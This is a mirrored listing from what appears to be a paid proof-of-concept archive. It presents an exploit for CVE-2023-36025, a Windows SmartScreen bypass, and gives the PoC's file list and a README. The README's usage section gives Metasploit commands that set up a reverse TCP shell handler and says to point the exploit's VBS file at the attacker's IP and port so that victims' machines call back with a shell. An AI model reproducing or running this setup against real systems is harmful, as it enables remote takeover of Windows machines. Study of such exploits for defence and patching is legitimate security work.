Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-36025 PoC — Windows SmartScreen Security Feature Bypass Vulnerability

Source
Associated Vulnerability
Title:Windows SmartScreen Security Feature Bypass Vulnerability (CVE-2023-36025)
Description:Windows SmartScreen Security Feature Bypass Vulnerability
Description
Windows SmartScreen Security Feature Bypass Vulnerability
Readme
# [EXPLOIT] CVE-2023-36025 - Description
Windows SmartScreen Security Feature Bypass Vulnerability

# Usage
- NOTE handler waiting for tcp request for target
- P.S configure CVE-2023-36025.vbs file to change the ip and port to machine ip and port that is being used for the TCP handler 
- configure reverse TCP handler
  msfconsole 
  use exploit/multi/handler 
  set payload windows/shell_reverse_tcp
  set LHOST <MACHINE IP>
  set LPORT <MACHINE PORT>
  run

File Snapshot

[4.0K] /data/pocs/edf9086138e8b36096459ddee7a40689b1894e30 ├── [ 57] CVE-2023-36025.url ├── [ 754] CVE-2023-36025.vbs └── [ 461] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →